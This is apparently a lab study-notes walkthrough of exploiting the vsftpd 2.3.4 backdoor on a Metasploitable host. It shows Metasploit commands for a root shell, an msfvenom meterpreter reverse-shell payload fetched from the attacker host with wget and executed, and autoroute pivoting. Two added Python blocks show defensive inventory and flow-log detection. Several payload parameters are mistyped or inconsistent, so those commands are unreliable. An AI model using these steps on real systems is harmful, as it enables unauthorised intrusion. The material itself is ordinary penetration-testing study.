Preface
A penetration test and privilege escalation against the VSFTPD 2.3.4 vulnerability
I. Using the database in Metasploit
Startup steps
root@kali:~# service postgresql start
root@kali:~# msfdb init
msfdb init initializes the database
- Start Metasploit with msfconsole
- Type db_status to check the database connection status; the output below shows a successful connection
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 > Interrupt: use the 'exit' command to quit
msf6 >
II. Scanning with nmap from within msf
msf6 > db_nmap -sV -u 192.168.1.105
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-06 15:22 CST
[*] Nmap: Nmap scan report for 192.168.1.105
[*] Nmap: Host is up (0.00035s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp open rpcbind 2 (RPC #100000)
...
- Use the services command to list the services running on the target's ports
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.1 80 tcp http open
192.168.1.1 1900 tcp upnp open
192.168.1.101 548 tcp afp filtered
192.168.1.102 8080 tcp tcpwrapped open
192.168.1.104 7000 tcp afs3-fileserver filtered
192.168.1.105 21 tcp ftp open vsftpd 2.3.4
192.168.1.105 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.1.105 23 tcp telnet open Linux telnetd
192.168.1.105 25 tcp smtp open Postfix smtpd
192.168.1.105 53 tcp domain open ISC BIND 9.4.2
192.168.1.105 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.1.105 111 tcp rpcbind open 2 RPC #100000
...
- The vsftpd 2.3.4 service is found
- Analyse the vulnerability present in this service
- Look for the matching exploit module in msf: search vsftpd2.3.4
msf6 > search vsftpd2.3.4
[-] No results from search
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 >
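The search above matches the banner to a single module. The same matching can be done on the defender's side against an inventory, before anyone runs an exploit. The following Python check is an added example (not code from the original post or from Metasploit): it parses the plain-text `services` listing shown earlier and flags any open port whose banner matches a known-vulnerable version. The only signature entry is the one the post itself identifies (vsftpd 2.3.4, `exploit/unix/ftp/vsftpd_234_backdoor`, disclosed 2011-07-03); the sample listing is a constructed copy of a few rows from the output above.

```python
"""Inventory check over a Metasploit `services` listing.

Added example, not part of the original post.  Parses the whitespace-
separated table printed by `services` and flags banners that match a
known-vulnerable version.
"""
import re
from dataclasses import dataclass

# Constructed sample: a subset of the `services` rows from the post.
SERVICES_LISTING = """\
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.1 80 tcp http open
192.168.1.101 548 tcp afp filtered
192.168.1.105 21 tcp ftp open vsftpd 2.3.4
192.168.1.105 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.1.105 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2
"""

# Banner patterns paired with the Metasploit module the post found for them.
# Only the entry identified in the post is listed; extend as needed.
KNOWN_BAD = [
    (re.compile(r"^vsftpd 2\.3\.4\b", re.I),
     "exploit/unix/ftp/vsftpd_234_backdoor (disclosed 2011-07-03)"),
]


@dataclass
class Service:
    host: str
    port: int
    proto: str
    name: str
    state: str
    info: str


def parse_services(text):
    """Turn the `services` table into Service records, skipping headers."""
    services = []
    for line in text.splitlines():
        parts = line.split()
        # header row, dashed underline, and blank/short lines carry no data
        if len(parts) < 5 or parts[0] == "host" or parts[0].startswith("-"):
            continue
        host, port, proto, name, state = parts[:5]
        # everything after the fifth column is the free-text banner
        info = " ".join(parts[5:])
        services.append(Service(host, int(port), proto, name, state, info))
    return services


def find_vulnerable(services):
    """Return (host, port, banner, reference) for open ports with a known-bad banner."""
    findings = []
    for svc in services:
        if svc.state != "open":
            continue
        for pattern, reference in KNOWN_BAD:
            if pattern.search(svc.info):
                findings.append((svc.host, svc.port, svc.info, reference))
    return findings


if __name__ == "__main__":
    for host, port, banner, ref in find_vulnerable(parse_services(SERVICES_LISTING)):
        print(f"{host}:{port} {banner!r} -> {ref}")
```

Rows whose state is not `open` are ignored, and rows without a banner simply never match; a fuller inventory check would also report version-less services for manual follow-up.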
III. Exploiting VSFTPD 2.3.4
1. Threat modelling
Select the exploit module with use, then list its parameters with options
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
2. Attack
Set the parameters with set and launch the attack
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.1.105
rhosts => 192.168.1.105
show payloads lists the payloads that can be used
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/interact normal No Unix Command, Interact with Established Connection
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload 0
payload => cmd/unix/interact
Run exploit to launch the attack
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.1.105:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.105:21 - USER: 331 Please specify the password.
[+] 192.168.1.105:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.105:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.105:6200) at 2021-05-06 15:46:56 +0800
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
- We have root on the target system, but only a plain shell; now we use this shell to escalate to the more capable meterpreter
- Use background to put the session in the background
background
Background session 1? [y/N] y
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
3. Privilege escalation
Open a new terminal and create a payload with msfvenom
┌──(root💀kali)-[~]
└─# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.113 lprot=4444 -f elf >door.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Start the apache2 service and move the file into the www directory
┌──(root💀kali)-[~]
└─# service apache2 start
┌──(root💀kali)-[~]
└─# mv door.elf ../var/www/html/
┌──(root💀kali)-[~]
└─# cd ../var/www/html/
┌──(root💀kali)-[/var/www/html]
└─# ls
backdoor.elf door.elf index.html index.nginx-debian.html
┌──(root💀kali)-[/var/www/html]
└─#
Switch to the other window, enter the session with sessions 1, and download the file with wget
wget http://192.168.1.113/door.elf
--04:00:39-- http://192.168.1.113/door.elf
=> `door.elf'
Connecting to 192.168.1.113:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207
0K 100% 52.85 MB/s
04:00:39 (52.85 MB/s) - `door.elf' saved [207/207]
The download succeeded; grant execute permission with chmod
chmod 777 door.elf
- To communicate with the compromised machine we also need to start a handler on our own system; the handler's IP and port must match the ones set in door.elf
- Set the payload
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
Set the parameters
msf6 exploit(multi/handler) > set lhost 192.168.1.113
lhost => 192.168.1.113
Run exploit
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
Switch to the other terminal and run the backdoor file with ./
./door.elf
Wait for the handler to respond; when the meterpreter prompt appears, the escalation succeeded
meterpreter >
But after many attempts and many restarts it would not connect; all I got was this result
# controlled host (target)
./door.elf
sh: line 36: 5588 Illegal instruction ./door.elf
# controlling host (attacker)
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] Sending stage (3012548 bytes) to 192.168.1.105
[*] Sending stage (3012548 bytes) to 192.168.1.105
[*] Sending stage (3012548 bytes) to 192.168.1.105
[*] Sending stage (3012548 bytes) to 192.168.1.105
After testing, the problem seems to be that setg was used when setting the parameters, and the port may also have conflicted; the fix is below
Generate the payload
┌──(root💀kali)-[~]
└─# msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.1.113 lprotE=4567 -f elf >door.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 1106216 bytes
Final size of elf file: 1106216 bytes
┌──(root💀kali)-[~]
└─# mv door.elf ../var/www/html/
Use the vsftpd 2.3.4 vulnerability to get a shell on the target, then download door.elf with wget and run it
setg rhosts 192.168.1.105
rhosts => 192.168.1.105
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.1.105:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.105:21 - USER: 331 Please specify the password.
[+] 192.168.1.105:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.105:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.105:6200) at 2021-05-06 20:48:18 +0800
wget http://192.168.1.113/door.elf
--08:48:51-- http://192.168.1.113/door.elf
=> `door.elf'
Connecting to 192.168.1.113:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,106,216 (1.1M)
0K .......... .......... .......... .......... .......... 4% 94.96 MB/s
50K .......... .......... .......... .......... .......... 9% 56.06 MB/s
100K .......... .......... .......... .......... .......... 13% 23.98 MB/s
150K .......... .......... .......... .......... .......... 18% 57.84 MB/s
200K .......... .......... .......... .......... .......... 23% 89.08 MB/s
250K .......... .......... .......... .......... .......... 27% 61.57 MB/s
300K .......... .......... .......... .......... .......... 32% 110.44 MB/s
350K .......... .......... .......... .......... .......... 37% 99.21 MB/s
400K .......... .......... .......... .......... .......... 41% 384.56 MB/s
450K .......... .......... .......... .......... .......... 46% 58.07 MB/s
500K .......... .......... .......... .......... .......... 50% 331.37 MB/s
550K .......... .......... .......... .......... .......... 55% 310.93 MB/s
600K .......... .......... .......... .......... .......... 60% 70.01 MB/s
650K .......... .......... .......... .......... .......... 64% 420.48 MB/s
700K .......... .......... .......... .......... .......... 69% 260.77 MB/s
750K .......... .......... .......... .......... .......... 74% 79.61 MB/s
800K .......... .......... .......... .......... .......... 78% 479.97 MB/s
850K .......... .......... .......... .......... .......... 83% 464.31 MB/s
900K .......... .......... .......... .......... .......... 87% 54.07 MB/s
950K .......... .......... .......... .......... .......... 92% 382.36 MB/s
1000K .......... .......... .......... .......... .......... 97% 60.63 MB/s
1050K .......... .......... .......... 100% 221.59 MB/s
08:48:51 (90.92 MB/s) - `door.elf' saved [1106216/1106216]
chmod 777 door.elf
./door.elf
On the attacker side, set the payload and run
msf6 exploit(multi/handler) > set payload payload/linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > setg lhost 192.168.1.113
lhost => 192.168.1.113
msf6 exploit(multi/handler) > setg lport 4567
lport => 4567
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.105:47496) at 2021-05-06 20:49:46 +0800
meterpreter >
Meterpreter obtained; let's play around a little
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
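Seen from the target's side, the two sessions in this section leave a recognisable trace in connection logs: the shell in section 2 was reached on 192.168.1.105:6200 right after an FTP login, and the escalation in section 3 had the FTP server itself connecting back to the attacking host (port 80 for the download, port 4444 for the handler). The following Python correlation is an added example, not code from the post or from Metasploit. It assumes a flow log with one `timestamp src sport dst dport` record per line and a small asset inventory naming the hosts that legitimately serve FTP; both the inventory and the flow records are constructed to mirror the sequence the post shows.

```python
"""Flow-log correlation for the activity shown in this post.

Added example, not part of the original post.  Flags (1) connections to
the backdoor shell port on an FTP server, rated higher when the same
client logged in to FTP shortly before, and (2) an FTP server opening
connections back to a client that recently logged in to it.
"""
from datetime import datetime, timedelta

# Constructed asset inventory: hosts that legitimately serve FTP.
FTP_SERVERS = {"192.168.1.105"}
FTP_PORT = 21
# Port on which the shell was reached in the post's session output.
BACKDOOR_PORT = 6200
# How long after an FTP login a related event is still correlated.
WINDOW = timedelta(minutes=30)

# Constructed flow records modelled on the post's sequence of events:
# FTP login from the attacker, connection to 6200, then the server
# calling back out to the attacker on 80 (wget) and 4444 (handler).
# The last line is an unrelated, ordinary FTP login.
FLOWS = """\
2021-05-06T15:46:50 192.168.1.113 51234 192.168.1.105 21
2021-05-06T15:46:56 192.168.1.113 51240 192.168.1.105 6200
2021-05-06T16:00:39 192.168.1.105 40011 192.168.1.113 80
2021-05-06T16:01:02 192.168.1.105 47496 192.168.1.113 4444
2021-05-06T16:05:00 192.168.1.120 52000 192.168.1.105 21
"""


def parse_flows(text):
    """Parse 'timestamp src sport dst dport' lines into tuples."""
    flows = []
    for line in text.splitlines():
        ts, src, sport, dst, dport = line.split()
        flows.append((datetime.fromisoformat(ts), src, int(sport), dst, int(dport)))
    return flows


def detect(flows):
    """Return (timestamp, severity, message) alerts in time order."""
    alerts = []
    last_ftp_login = {}  # (client, server) -> time of most recent FTP connection
    for ts, src, sport, dst, dport in sorted(flows):
        if dst in FTP_SERVERS and dport == FTP_PORT:
            last_ftp_login[(src, dst)] = ts

        if dst in FTP_SERVERS and dport == BACKDOOR_PORT:
            prior = last_ftp_login.get((src, dst))
            recent = prior is not None and ts - prior <= WINDOW
            severity = "high" if recent else "medium"
            alerts.append((ts, severity,
                           f"{src} -> {dst}:{dport} backdoor shell port on FTP server"
                           + (" after FTP login" if recent else "")))

        # an FTP server should not initiate connections to its own clients
        prior = last_ftp_login.get((dst, src))
        if src in FTP_SERVERS and prior is not None and ts - prior <= WINDOW:
            alerts.append((ts, "high",
                           f"{src} -> {dst}:{dport} FTP server calling back to recent client"))
    return alerts


if __name__ == "__main__":
    for ts, severity, message in detect(parse_flows(FLOWS)):
        print(ts.isoformat(), severity.upper(), message)
```

The callback rule is deliberately port-agnostic: the post reached the handler on 4444 only after first failing on a mismatched setup, so keying detection on one port would have missed the earlier attempts. The ordinary login on the last line produces no alert.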
4. Setting up a pivot to scan the internal network
Once meterpreter is obtained, set up a pivot with autoroute
meterpreter > run autoroute -p
[*] No routes have been added yet
meterpreter > run autoroute -s 192.168.1.0 255.255.255.0
[*] Adding a route to 192.168.1.0/255.255.255.0...
[+] Added route to 192.168.1.0/255.255.255.0 via 192.168.1.105
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.1.0 255.255.255.0 Session 1
meterpreter >
Use background to send the session to the background
meterpreter > background
[*] Backgrounding session 1...
Scan the internal network with an auxiliary module
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf6 auxiliary(scanner/portscan/tcp) > setg rhosts 192.168.1.105
rhosts => 192.168.1.105
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.1.105: - 192.168.1.105:23 - TCP OPEN
[+] 192.168.1.105: - 192.168.1.105:22 - TCP OPEN
[+] 192.168.1.105: - 192.168.1.105:21 - TCP OPEN
[+] 192.168.1.105: - 192.168.1.105:25 - TCP OPEN
[+] 192.168.1.105: - 192.168.1.105:53 - TCP OPEN
[+] 192.168.1.105: - 192.168.1.105:80 - TCP OPEN
[+] 192.168.1.105: - 192.168.1.105:111 - TCP OPEN
Through a pivot, the internal network can be scanned and penetrated, revealing vulnerabilities on more hosts
Summary
This post briefly covers exploiting the vsftpd 2.3.4 backdoor vulnerability and escalating privileges. I am still learning myself; this is for reference only, as study notes, and discussion is welcome.